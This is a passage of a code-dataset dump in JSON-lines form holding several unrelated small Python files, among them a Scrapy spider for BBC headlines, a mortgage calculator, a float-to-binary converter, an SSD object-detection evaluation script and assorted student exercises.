TRIALS))\n # print ratio of civs-per-volume vs probability of 2+ civs per location\n print(\"{:.4f} {:.4f}\".format(civs_per_vol, prob))\n x.append(civs_per_vol)\n y.append(prob)\n\n# part2\ncoefficients = np.polyfit(x, y, 4) #4th order polynomial fit\np = np.poly1d(coefficients)\nprint('\\n{}'.format(p))\nxp = np.linspace(0,5)\n_ = plt.plot(x, y, '.', xp, p(xp), '-')\nplt.ylim(-0.5, 
1.5)\nplt.show()","repo_name":"fancyf33t/MilkyWayModel","sub_path":"probability_of_detection.py","file_name":"probability_of_detection.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"45407941403","text":"from urllib.parse import urlparse\n\nimport scrapy\n\n\nclass BBCSpider(scrapy.Spider):\n name = \"bbc\"\n allowed_domains = [\"bbc.com\"]\n start_urls = [\"https://www.bbc.com\"]\n\n def remove_domain(self, urls):\n cleaned_urls = []\n for url in urls:\n parsed_url = urlparse(url)\n cleaned_urls.append(parsed_url.path)\n return cleaned_urls\n\n def parse(self, response):\n articles = self.remove_domain(response.css(\"a.media__link ::attr(href)\").getall())\n tags = response.css(\"a.media__tag ::text\").getall()\n\n home_page_titles = [title.strip() if title else \"\" for title in response.css(\"a.media__link::text\").getall()]\n\n for article, home_page_title, tag in zip(articles, home_page_titles, tags):\n yield response.follow(\n article,\n callback=self.parse_article,\n meta={\n \"home_page_title\": home_page_title,\n \"tag\": tag,\n },\n dont_filter=True,\n )\n\n def parse_article(self, response):\n \"\"\"\n Parse Articles Detail Page\n \"\"\"\n\n page_title = response.css(\"h1::text\").get()\n article_detail_page_image = response.css(\"meta[property='og:image']::attr(content)\").get()\n\n if not page_title:\n page_title = response.css(\"#main-heading > span::text\").get()\n\n home_page_title = response.meta[\"home_page_title\"]\n\n data = {}\n\n # If title on home page is different than the title on articles detail page, show both titles\n if page_title != home_page_title:\n data[\"home_page_title\"] = home_page_title\n\n data_dict = {\n \"page_title\": page_title.strip() if page_title else \"\",\n \"image\": article_detail_page_image if \"live\" not in response.url else \"LIVE PAGE\",\n \"url\": response.url,\n \"tag\": response.meta[\"tag\"],\n }\n\n data.update(data_dict)\n yield data\n","repo_name":"afafadia/scrapy_bbc","sub_path":"scrapy_bbc/spiders/bbc.py","file_name":"bbc.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37354667760","text":"#ques1\r\n#pyhton program to find average of 3 numbers\r\n#take input\r\nnum1=float(input('Enter first number: '))\r\nnum2=float(input('Enter second number: '))\r\nnum3=float(input('Enter third number: '))\r\n#calculate average\r\navg=(num1 + num2 +num3)/3\r\n#result\r\nprint(avg)\r\n\r\n#ques 2\r\n#pyhton program to compute person's income tax\r\n#input gross income\r\ngrossinc=float(input('Enter your gross income: '))\r\n#input number of dependents\r\ndependents=float(input('Enter number of dependents: '))\r\ntaxableincome=grossinc-10000-(dependents*3000)\r\ntax=(20*taxableincome)/100\r\nprint(tax)\r\n\r\n#ques 3\r\n#python program to store different data type in list\r\n#input\r\nname=input('Enter your name: ')\r\ngender=input('Your Gender(M for male , F for female , U for unknown):')\r\nSID=input('Enter your SID: ')\r\nCourseName=input('Enter your course name: ')\r\nCGPA=float(input('Enter your CGPA: '))\r\nstudent=[SID,name,gender,CourseName,CGPA]\r\nprint(student)\r\n\r\n#ques 4\r\n#Write a python program to enter marks of 5 students into a list and display\r\n#them in sorted manner.\r\nnum1=float(input('Enter marks of student 1: '))\r\nnum2=float(input('Enter marks of student 2: '))\r\nnum3=float(input('Enter marks of 
student 3: '))\r\nnum4=float(input('Enter marks of student 4: '))\r\nnum5=float(input('Enter marks of student 5: '))\r\nmarks=[num1,num2,num3,num4,num5]\r\nprint(marks)\r\n\r\n#ques 5\r\n#5-a\r\ncolor1=['Red','Green','White','Black','Pink','Yellow']\r\nprint(color1)\r\ncolor1.pop(3)\r\nprint(color1)\r\n\r\n#5-b\r\ncolor2=['Red','Green','White','Black','Pink','Yellow']\r\ncolor2[3:5]=['Purple']\r\nprint(color2)\r\n","repo_name":"JatinKharbanda21104077/Computing-Assignment","sub_path":"Assign1_21104077.py","file_name":"Assign1_21104077.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11171773276","text":"import sys\n\ninput = sys.stdin.readline\n\nN, S = map(int, input().split())\narray = list(map(int, input().split()))\n\nleft, right = 0, 0\ncurrent_sum = array[0]\nmin_length = 100001\nwhile (True):\n if (left > right) or (right >= len(array)):\n break\n\n if current_sum < S:\n right += 1\n if right >= len(array):\n break\n current_sum += array[right]\n continue\n\n # print(\"left, right\", left, right)\n # print(\"array[left], array[right]\", array[left], array[right])\n # print(\"length, min_length\", right - left + 1, min_length)\n min_length = min(min_length, right - left + 1)\n current_sum -= array[left]\n left += 1\n\nprint(min_length if min_length != 100001 else 0)\n","repo_name":"b2s-study/ps-study-step1","sub_path":"Baekjoon/dj-1087/[1806] 부분합.py","file_name":"[1806] 부분합.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72112617794","text":"#CLI like interface\n\nimport argparse, getopt, os, io, struct, mtproto\nfrom classes.shell import TelepyShell\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('telepy',description='Python implementation of telegram API.')\n parser.add_argument('command', nargs='?', choices=['cmd', 'dialog_list', 'contact_list'] + ['chat_' + sub for sub in ['info', 'add_user', 'add_user_to_chat', 'del_user', 'set_photo', 'rename']])\n parser.add_argument('args', nargs='*')\n\n #for command, args, help in (('info', 1, 'prints info about chat'), ('add_user', 2, 'add user to chat'), ('del_user', 2, 'remove user from chat'), ('set_photo', 1, 'sets group chat photo. 
Same limits as for profile photos.')):\n # parser.add_argument('chat_' + command, nargs=args, help=help)\n #parser.add_argument\n args = parser.parse_args()\n\n if args.command is None:\n TelepyShell().cmdloop()","repo_name":"griganton/telepy_old","sub_path":"telepy.py","file_name":"telepy.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"29550757113","text":"\nclass PrecisionError(Exception):\n pass\n\ndef get_binary_integers(integer: int) -> list:\n exponents = []\n while integer:\n quotient, exp = integer // 2, integer % 2\n exponents.append(exp)\n integer = quotient\n return exponents[::-1]\n\n\ndef get_biased_form(exponent: int) -> list:\n bias = get_binary_integers(127 + exponent)\n return right_pad(bias, 8)\n\n\ndef get_binary_decimals(fraction: float) -> list:\n mantissa = []\n while fraction and len(mantissa) < 23:\n fraction = fraction * 2\n decimal = int(fraction)\n mantissa.append(decimal)\n fraction = fraction - decimal\n\n if fraction:\n raise PrecisionError(\n \"Insufficient precision, cannot represent value in binary format.\"\n )\n return mantissa\n\n\ndef get_exponent(integers, mantissa):\n if integers and integers[0] == 1:\n exp = len(integers) - 1\n else:\n exp = -1\n for v in mantissa:\n if v == 0:\n exp -= 1\n else:\n break\n return exp\n\n\ndef left_pad(arr: list, size: int):\n while len(arr) < size:\n arr = arr + [0]\n return arr\n\n\ndef right_pad(arr: list, size: int):\n while len(arr) < size:\n arr = [0] + arr\n return arr\n\n\ndef get_significand(integers: list, decimals: list, exponent: int):\n mantissa = integers + decimals\n if exponent < 0:\n significand = mantissa[abs(exponent):]\n else:\n significand = mantissa[1:]\n return left_pad(significand, 23)\n\n\ndef float_to_binary_form(float_number: float):\n sign = [1] if float_number < 0 else [0]\n integers, decimals = int(float_number), abs(float_number - int(float_number))\n integers = get_binary_integers(integers)\n decimals = get_binary_decimals(decimals)\n exponent = get_exponent(integers, decimals)\n significand = get_significand(integers, decimals,exponent)\n exponent = get_biased_form(exponent)\n binary_form = sign + exponent + significand\n print(binary_form)\n return \"\".join(str(d) for d in binary_form)\n","repo_name":"yassineayadi/ctci-python","sub_path":"src/chapter05/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42272138340","text":"import math\nimport ulab.numpy as np\nimport time\n\n\ndef FFT(samples, timevector, sample_rate):\n y = samples # the data to make the fft from\n n = len(y) # length of the signal\n k = np.arange(n)\n T = n/sample_rate\n frq = k/T # two sides frequency range\n Y, img = np.fft.fft(y) # fft computing and normalization\n\n return frq, Y\n\nL = 1024\n\ntimevec = np.arange(L)\nsineWave1 = np.zeros(L)\nsineWave2 = np.zeros(L)\nsineWave3 = np.zeros(L)\nsumSines = np.zeros(L)\n\nF1 = 1\nF2 = 5\nF3 = 10\n\nfor i in range(L):\n sineWave1[i] = math.sin(2*math.pi*F1*(i/1024))\n sineWave2[i] = math.sin(2*math.pi*F2*(i/1024))\n sineWave3[i] = math.sin(2*math.pi*F3*(i/1024))\n sumSines[i] = sineWave1[i] + sineWave2[2] + sineWave3[i]\n\nfrq, Y = FFT(sumSines, timevec, 1024)\n\nprint(Y[0])\n\nfor i in range(L):\n if i % 11 == 0:\n print(\"(\"+str(math.log(abs(Y[i])))+\")\")\n 
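 # short delay between printed bins so a serial console or plotter can keep up with the output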
time.sleep(.005)\n\n","repo_name":"kkrausplymouth/ME433","sub_path":"HW11/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23708669048","text":"# Python Mortgage Calculator\n# First Codecademy project: utilizing Terminal, Git, Github, Object Oriented Programming\n\nclass MortgageCalculator:\n\n def __init__(self, yearly_percentage_rate, loan_term, principal):\n self.yearly_percentage_rate = yearly_percentage_rate\n self.loan_term = loan_term\n self.principal = principal\n self.monthly_percentage_rate = self.yearly_percentage_rate / 12\n self.number_monthly_payments = self.loan_term * 12\n\n def monthly_percentage(self):\n\n # Monthly percentage rate\n return \"Your monthly percentage rate = \" + \"{:.3f}\".format(self.monthly_percentage_rate)\n\n def number_payments(self):\n \n # Number of monthly payments\n return \"Your number of payments = \" + str(self.number_monthly_payments)\n\n def calculate_monthly_payment(self):\n \n # Calculate monthly payment\n if self.monthly_percentage_rate != 0:\n monthly_payment = ((self.monthly_percentage_rate * self.principal) / (1 - (1 + self.monthly_percentage_rate) ** -self.number_monthly_payments))\n else:\n monthly_payment = self.principal / self.number_monthly_payments\n\n return \"Your monthly payment = $\" + \"{:.2f}\".format(monthly_payment)\n\n def calculate_debt_schedule(self):\n # Shows the amount owed every month\n for i in range(self.number_monthly_payments):\n p = self.principal\n x = (1 + self.monthly_percentage_rate)\n # Polynomial of x\n pn_x = ((x ** i - 1) / (x - 1))\n # Monthly payment\n c = ((self.monthly_percentage_rate * self.principal) / (1 - (1 + self.monthly_percentage_rate) ** -self.number_monthly_payments))\n # Calculates the amount owed\n amount_owed = x ** i * p - pn_x * c\n print(\"Amount owed at month {} = {:.2f}\".format(i + 1, amount_owed))\n i += 1\n\ndef run_calculator():\n\n # Choice to keep running or exit\n print(\"Enter 1 for mortgage calculator\")\n print(\"Enter 2 to exit\")\n \n choice = input(\"Enter your choice: \")\n\n while choice != \"1\" and choice != \"2\":\n print(\"Please enter a valid choice: \")\n choice = input(\"Enter 1 to calculate a mortgage payment or 2 to exit: \")\n print(\"----------------------------------------\")\n\n while choice == \"1\":\n # Enter the variables for the calculation\n while True:\n try:\n yearly_percentage_rate = float(input(\"What is the yearly percentage rate? Enter as a decimal: \"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid yearly percentage rate.\")\n \n while True:\n try:\n loan_term = int(input(\"What is the duration of the mortgage? \"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid loan term.\")\n \n while True:\n try:\n principal = float(input(\"What is the amount borrowed? 
$\"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid amount.\")\n\n mortgage1 = MortgageCalculator(yearly_percentage_rate, loan_term, principal)\n\n print(mortgage1.number_payments())\n print(\"----------------------------------------\")\n\n print(mortgage1.monthly_percentage())\n print(\"----------------------------------------\")\n\n print(mortgage1.calculate_monthly_payment())\n print(\"----------------------------------------\")\n\n mortgage1.calculate_debt_schedule()\n print(\"----------------------------------------\")\n\n choice = int(input(\"Enter 1 to calculate another mortgage payment or 2 to exit: \"))\n print(\"----------------------------------------\")\n \n\nrun_calculator()","repo_name":"sivers1985/Mortgage_Calculator","sub_path":"Mortgage_Calculator.py","file_name":"Mortgage_Calculator.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30299004952","text":"from __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nfrom PIL import Image\nimport _init_paths\nfrom lib.core import ssd_config as cfg\nfrom utils.blob import BaseTransform\nfrom datasets.coco_test import COCODetection\nfrom modeling.SSD import build_ssd\nimport time\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')\nparser.add_argument('--trained_model', default=cfg.PRETRAINED_WEIGHT,\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--save_folder', default='eval/', type=str,\n help='Dir to save results')\nparser.add_argument('--visual_threshold', default=0.6, type=float,\n help='Final confidence threshold')\nparser.add_argument('--cuda', default=True, type=bool,\n help='Use cuda to train model')\nparser.add_argument('--coco_root', default=cfg.COCO_ROOT, help='Location of COCO/VOC root directory')\nparser.add_argument('-f', default=None, type=str, help=\"Dummy arg so we can load in Jupyter Notebooks\")\nargs = parser.parse_args()\n\nif args.cuda and torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nelse:\n torch.set_default_tensor_type('torch.FloatTensor')\n\nif not os.path.exists(args.save_folder):\n os.mkdir(args.save_folder)\n\n\ndef test_net(save_folder, net, cuda, testset, transform, thresh):\n # dump predictions and assoc. 
ground truth to text file for now\n filename = save_folder+'test_result_new.txt'\n num_images = len(testset)\n print('~~~~~~~~~~~~~~~~~: ', num_images)\n all_boxes = [[[] for _ in range(num_images)]\n for _ in range(len(cfg.COCO_CLASSES)+1)]\n for i in range(num_images):\n im, gt, h, w = testset.pull_item(i)\n\n print('Testing image {:d}/{:d}....'.format(i+1, num_images))\n img = testset.pull_image(i)\n img_id, annotation = testset.pull_anno(i)\n x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)\n x = Variable(x.unsqueeze(0))\n\n # with open(filename, mode='a') as f:\n # f.write('\\nGROUND TRUTH FOR: '+str(img_id)+'\\n')\n # for box in annotation:\n # f.write('label: '+' || '.join(str(b) for b in box)+'\\n')\n if cuda:\n x = x.cuda()\n t0 = time.time()\n y = net(x) # forward pass\n detections = y.data\n # # scale each detection back up to the image\n # scale = torch.Tensor([img.shape[1], img.shape[0],\n # img.shape[1], img.shape[0]])\n t1 = time.time()\n print('timer: %.4f sec.' % (t1 - t0),flush=True)\n pred_num = 0\n for j in range(1, detections.size(1)):\n # # if i!=0:\n # j = 0\n # while detections[0, i, j, 0] >= 0.1:\n # if pred_num == 0:\n # with open(filename, mode='a') as f:\n # f.write(str(img_id)+'\\n')\n # score = detections[0, i, j, 0]\n # label_name = labelmap[i-1]\n # pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n # coords = (pt[0], pt[1], pt[2], pt[3])\n # pred_num += 1\n # with open(filename, mode='a') as f:\n # f.write(str(pred_num)+' label: '+str(i)+' score: ' +\n # str(score) + ' '.join(str(c) for c in coords) + '\\n')\n # j += 1\n k = 0\n inds = np.where(detections[0, j, k, 0] > 0.01)[0]\n if len(inds) == 0:\n all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)\n continue\n dets = detections[0, j, :]\n mask = dets[:, 0].gt(0.).expand(5, dets.size(0)).t()\n dets = torch.masked_select(dets, mask).view(-1, 5)\n if dets.size(0) == 0:\n continue\n boxes = dets[:, 1:]\n boxes[:, 0] *= w\n boxes[:, 2] *= w\n boxes[:, 1] *= h\n boxes[:, 3] *= h\n scores = dets[:, 0].cpu().numpy()\n cls_dets = np.hstack((boxes.cpu().numpy(),\n scores[:, np.newaxis])).astype(np.float32,\n copy=False)\n all_boxes[j][i] = cls_dets\n k += 1\n\n print('im_detect: {:d}/{:d}'.format(i + 1, num_images))\n print('Evaluating detections')\n testset.evaluate_detections(all_boxes,save_folder)\n # evaluate_detections(all_boxes, output_dir, test_net)\n\n# def evaluate_detections(box_list, output_dir, dataset):\n # write_voc_results_file(box_list, dataset)\n # do_python_eval(output_dir)\n\n\n\ndef test_coco():\n # load net\n num_classes = len(cfg.COCO_CLASSES) + 1 # +1 background\n print('num of class: ', num_classes)\n net = build_ssd('test', 300, num_classes) # initialize SSD\n net.load_state_dict(torch.load(args.trained_model))\n net.eval()\n print('Finished loading model!')\n # load data\n testset = COCODetection(args.coco_root)\n if args.cuda:\n net = net.cuda()\n cudnn.benchmark = True\n # evaluation\n test_net(args.save_folder, net, args.cuda, testset,\n BaseTransform(net.size, (104, 117, 123)),\n thresh=args.visual_threshold)\n\nif __name__ == '__main__':\n test_coco()\n","repo_name":"wdd0225/RetinaNet-and-SSD-in-PyTorch-Detectron","sub_path":"tools/test_coco_eval.py","file_name":"test_coco_eval.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5162692569","text":"class PlayerDetail(object):\n def __init__(self, info: list):\n super(PlayerDetail, self).__init__()\n self.index = 
int(info[0])\n self.name = info[1]\n self.top_win_handler = int(info[2])\n self.bind_win_handler = int(info[3])\n self.is_in_android = True if int(info[4]) == 1 else False\n self.pid = int(info[5])\n self.virtual_box_pid = int(info[6])\n\n def is_running(self) -> bool:\n return self.is_in_android\n\n def __str__(self):\n index = self.index\n name = self.name\n r = str(self.is_in_android)\n twh = self.top_win_handler\n bwh = self.bind_win_handler\n pid = self.pid\n virtual_box_pid = self.virtual_box_pid\n return \"\\n index:%d name:%s top:%08X bind:%08X running:%s pid:%d virtual_box_pid:%d\\n\" % (\n index, name, twh, bwh, r, pid, virtual_box_pid)\n","repo_name":"1057234721/Game","sub_path":"Crack_Onmyoji/player_detail.py","file_name":"player_detail.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37025869128","text":"\"\"\"Initialize app.\"\"\"\nfrom flask import Flask, render_template, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\nimport os\n\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef template_render(item, template_name):\n return render_template(os.path.join(item, template_name))\n\n\ndef create_app():\n \"\"\"Construct the core app object.\"\"\"\n app = Flask(__name__, instance_relative_config=False)\n\n # Application Configuration\n app.config.update(TESTING=True,\n DEBUG=True,\n SECRET_KEY=\"104838b865614f38846c2a9f37a2d86d\", #secret key\n SQLALCHEMY_DATABASE_URI=\"sqlite:///daycare.db\", # db name\n SQLALCHEMY_ECHO=False,\n SQLALCHEMY_TRACK_MODIFICATIONS=False\n )\n\n # Initialize Plugins\n db.init_app(app)\n login_manager.init_app(app)\n\n with app.app_context():\n from app import home_routes, login_routes, profile_routes, main_routes, manager_routes\n\n app.register_blueprint(home_routes.home_bp)\n\n # Register Blueprints\n app.register_blueprint(login_routes.login_bp)\n app.register_blueprint(profile_routes.profile_bp)\n app.register_blueprint(main_routes.main_bp)\n app.register_blueprint(manager_routes.manager_bp)\n\n # Create Database Models)\n db.create_all()\n\n return app\n","repo_name":"jatinder869/PetDayCare","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9251896129","text":"import torch\nimport torch.nn as nn\nfrom bahdanau_attention import BahdanauAttention\nimport torch.nn.functional as F\nimport numpy\nclass Decoder(nn.Module):\n def __init__(self, emb_size, hidden_size, attention, num_layers=1, dropout=0.5,\n bridge=True, inputfeeding=False, soft=True):\n super(Decoder, self).__init__()\n\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.attention = attention\n self.dropout = dropout\n self.inputfeeding = inputfeeding\n self.soft = soft\n \n self.rnn_feed = nn.LSTM(emb_size + 2 * hidden_size, hidden_size, num_layers,\n batch_first=True, dropout=dropout)\n self.rnn_nofeed = nn.LSTM(emb_size, hidden_size, num_layers,\n batch_first=True, dropout=dropout)\n # self.rnn = nn.GRU(emb_size + 2 * hidden_size, hidden_size, num_layers,\n # batch_first=True, dropout=dropout)\n\n self.bridgeh = nn.Linear(2 * hidden_size, hidden_size, bias=True) if bridge else None\n self.bridgec = nn.Linear(2 * hidden_size, hidden_size, bias=True) if bridge else None\n self.dropout_layer = nn.Dropout(p=dropout)\n self.pre_output_layer = 
nn.Linear(hidden_size + 2 * hidden_size + emb_size,\n hidden_size, bias=False)\n self.pre_output_layer_hard = nn.Linear(hidden_size + emb_size,\n hidden_size, bias=False)\n\n\n def forward_step(self, prev_embed, encoder_hidden, src_mask, hidden, cell,\n context):\n # input feeding\n if self.inputfeeding:\n rnn_input = torch.cat([prev_embed, context], dim=2)\n output, (hidden, cell) = self.rnn_feed(rnn_input, (hidden, cell))\n else:\n rnn_input = prev_embed\n output, (hidden, cell) = self.rnn_nofeed(rnn_input, (hidden, cell))\n query = hidden[-1].unsqueeze(1)\n context, atten_probs = self.attention(query=query,\n value=encoder_hidden, mask=src_mask)\n pre_output = torch.cat([prev_embed, output, context], dim=2) \n pre_output = self.dropout_layer(pre_output)\n pre_output = self.pre_output_layer(pre_output)\n\n return output, hidden, cell, context, pre_output\n\n def decode_soft(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n if hidden is None:\n hidden = self.init_hidden(encoder_final[0])\n \n if cell is None:\n cell = self.init_cell(encoder_final[1])\n \n decoder_states = []\n pre_output_vectors = []\n context = torch.zeros(encoder_hidden.shape[0], 1, 2 * hidden.shape[-1])\n for i in range(max_len):\n prev_embed = trg_embed[:, i].unsqueeze(1)\n\n output, hidden, cell, context, pre_output = self.forward_step(\n prev_embed, encoder_hidden, src_mask, hidden, cell, context\n )\n decoder_states.append(output)\n pre_output_vectors.append(pre_output)\n\n decoder_states = torch.cat(decoder_states, dim=1)\n pre_output_vectors = torch.cat(pre_output_vectors, dim=1)\n return decoder_states, (hidden, cell), pre_output_vectors\n\n def forward(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n \n if max_len is None:\n max_len = trg_mask.size(-1)\n if self.soft:\n return self.decode_soft(trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden, cell, max_len)\n return self.decode_hard(trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden, cell, max_len)\n\n def init_hidden(self, encoderh_final):\n if encoderh_final is None:\n return None\n \n return torch.tanh(self.bridgeh(encoderh_final))\n\n def init_cell(self, encoderc_final):\n if encoderc_final is None:\n return None\n \n return torch.tanh(self.bridgec(encoderc_final))\n\n\n def decode_hard(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n if hidden is None:\n hidden = self.init_hidden(encoder_final[0])\n if cell is None:\n cell = self.init_cell(encoder_final[1])\n # proj_key = self.attention.key_layer(encoder_hidden)\n decoder_states = []\n pre_output_vectors = []\n for i in range(max_len):\n prev_embed = trg_embed[:, i].unsqueeze(1)\n output, hidden, cell, pre_output = self.forward_step_hard(\n prev_embed, encoder_hidden, src_mask, hidden, cell, decoder_states)\n pre_output_vectors.append(pre_output)\n\n decoder_states = torch.cat(decoder_states, dim=1)\n pre_output_vectors = torch.cat(pre_output_vectors, dim=1)\n return decoder_states, (hidden, cell), pre_output_vectors\n\n def forward_step_hard(self, prev_embed, encoder_hidden, src_mask, hidden, cell, decoder_states):\n output, (hidden, cell) = self.rnn_nofeed(prev_embed, (hidden, cell))\n decoder_states.append(output)\n query = hidden[-1].unsqueeze(1)\n atten_probs, encoder_proj = self.attention(query=query,#torch.cat(decoder_states, dim=1),\n value=encoder_hidden, mask=src_mask)\n # 
decoder_hidden = torch.FloatTensor(decoder_states)\n outputs = None\n for i in range(len(encoder_proj[0])):\n temp_out = torch.tanh(decoder_states[-1].squeeze(1) + encoder_proj[:,i])\n \n # softmax here; the log is taken after the attention-weighted sum below\n temp_out = F.softmax(temp_out, dim=-1)\n temp_out = temp_out.unsqueeze(1)\n if outputs is None:\n outputs = temp_out\n else:\n outputs = torch.cat((outputs, temp_out), dim=1)\n\n final_out = torch.bmm(atten_probs, outputs)\n final_out = torch.log(final_out)\n final_out = torch.cat([prev_embed, final_out], dim=2)\n final_out = self.dropout_layer(final_out)\n final_out = self.pre_output_layer_hard(final_out)\n return output, hidden, cell, final_out\n ","repo_name":"JamesLuoyh/character-level-soft-and-hard-attention","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"32798733124","text":"import pytest\nimport json\nfrom productporter.product.phapi import ProductHuntAPI\nfrom productporter.product.models import Product\n# Use the development configuration if available\ntry:\n from productporter.configs.development import DevelopmentConfig as Config\nexcept ImportError:\n from productporter.configs.default import DefaultConfig as Config\n\n@pytest.fixture(scope=\"session\")\ndef some_day():\n \"\"\"Return some old, fixed date\"\"\"\n return '2014-12-16'\n\n@pytest.fixture(scope=\"session\")\ndef some_posts(some_day):\n \"\"\"\n Pull posts from producthunt.com with the official API\n \"\"\"\n if Config.PH_API_USE_SAMPLE_DATA:\n from sampledata import SAMPLE_DATA\n jsondata = json.loads(SAMPLE_DATA)\n return jsondata['posts']\n else:\n api = ProductHuntAPI()\n return api.posts(some_day)\n\n@pytest.fixture()\ndef db_posts(database, some_posts):\n \"\"\"\n Pull posts from producthunt.com with the official API\n And save them to the database as sample test data\n \"\"\"\n postids=[]\n for jsondata in some_posts:\n pi = Product.query.filter(Product.postid==jsondata['id']).first()\n assert pi is None\n pi = Product.from_json(jsondata)\n pi.save()\n postids.append(pi.postid)\n\n return postids\n\n","repo_name":"kamidox/weixin_producthunt","sub_path":"tests/fixtures/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"29694925044","text":"# Write a class for storing information about a person:\n# full name, age, etc. of your choosing.\n# The class must have methods: birthday to increase\n# the age by one year, and full_name to print the full name, etc. of your choosing.\n
на\n# ваш выбор.\n# Убедитесь, что свойство возраст недоступно для прямого\n# изменения, но есть возможность получить текущий возраст\n\n\nclass Human:\n\n def __init__(self, firstname: str, lastname: str, age: int, gender: str):\n self.firstname = firstname\n self.lastname = lastname\n self.__age = age\n self.gender = gender\n\n def get_age(self):\n return self.__age\n\n def birthday(self):\n self.__age += 1\n\n def __str__(self):\n return f'{self.firstname} {self.lastname} {self.get_age()} {self.gender}'\n\n\n\n\n\n\nif __name__ == '__main__':\n h_1 = Human('Иван', 'Иванов', 23, 'мужской')\n h_2 = Human('Петр', 'Сидоров', 40, 'мужской')\n print(h_1)\n print(h_2)\n h_1.birthday()\n h_2.birthday()\n print(h_1)\n print(h_2)\n","repo_name":"SergeiEremkin/GeekBrains","sub_path":"seminar_10/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5698527116","text":"# Baekjoon Online Judge - 1051번. 숫자 정사각형\n\n\nN, M = map(int, input().split())\narr = []\nresult = 0\nfor _ in range(N):\n arr.append(list(map(int, input())))\n\nmin_val = min(N, M) # 정사각형을 만들기 위해 N과 M값중 최소를 구함\n\n# 하나씩 다 돌며 정사각형을 만들 수 있는 꼭지점들을 체크해준다\nfor i in range(N):\n for j in range(M):\n for k in range(min_val):\n if i + k < N and j + k < M and (arr[i][j] == arr[i + k][j] == arr[i][j + k] == arr[i + k][j + k]):\n result = max(result, (k + 1) ** 2)\nprint(result)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1051.py","file_name":"BOJ_1051.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28123045128","text":"\"\"\"\n\"\"\"\nimport numpy as np\nimport h5py\n\nclass DetectorPointCloud:\n \"\"\"\n \"\"\"\n def __init__(self):\n self.clear()\n \n def clear(self):\n self.x = []\n self.y = []\n self.z = []\n self.t_drift = []\n self.ts_pps = []\n self.Q = []\n self.E = []\n self.segment_id = []\n\n self.source_label = []\n self.topology_label = []\n self.particle_label = []\n self.physics_label = []\n\n self.unique_topology = []\n self.unique_particle = []\n self.unique_physics = []\n\n\n def add_point(self,\n x, y, z, t_drift, ts_pps, Q, E, segment_id\n ):\n self.x.append(x)\n self.y.append(y)\n self.z.append(z)\n self.t_drift.append(t_drift)\n self.ts_pps.append(ts_pps)\n self.Q.append(Q)\n self.E.append(E)\n self.segment_id.append(segment_id)\n\n self.source_label.append(-1)\n self.topology_label.append(-1)\n self.particle_label.append(-1)\n self.physics_label.append(-1)\n\n self.unique_topology.append(-1)\n self.unique_particle.append(-1)\n self.unique_physics.append(-1)\n 